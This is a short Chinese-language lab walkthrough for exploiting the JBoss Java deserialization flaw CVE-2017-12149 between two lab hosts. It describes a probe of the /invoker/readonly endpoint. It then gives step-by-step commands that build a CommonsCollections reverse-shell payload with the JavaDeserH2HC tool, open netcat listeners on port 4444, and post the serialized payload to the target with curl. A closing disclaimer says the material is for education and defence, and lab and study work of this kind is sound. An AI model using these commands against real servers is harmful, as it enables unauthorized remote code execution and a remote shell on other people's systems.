一. 实验环境
软件 | 版本 | 注释 |
---|---|---|
JBoss | V6.0Final | |
jboss-_CVE-2017-12149 | 利用工具 |
二. 安装实验环境
环境 | 版本 | 注释 |
---|---|---|
靶机 | Windows 2008 R2 | IP : 10.1.1.240 |
攻击机 | Windows 2008 R2 | IP : 10.1.1.253 |
安装了 java 环境(不在重复)
解压压缩包,cmd 进入 \jboss-6.1.0.Final\bin 目录下
在 cmd 中执行 run.bat -b 0.0.0.0
运行成功
三. 实验步骤
检测目录:
http://10.1.1.240:8080/invoker/readonly
返回500 一般就是存在了。
直接使用我们的jboss-_CVE-2017-12149
工具
目标输入服务器IP地址
输出想要执行的命令
四. 反弹(未)
下载利用工具:JavaDeserH2HC
将工具复制到 kali 里面,解压即可。
接下来输入命令:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
//反弹shell的IP和端口
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
使用Kali 用 nc 监听端口:
nc -vlp 4444
或
nc -vv -l 4444
这个时候会同目录下生成一个ReverseShellCommonsCollectionsHashMap.ser文件
curl 这个二进制文件
curl http://10.1.1.240:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。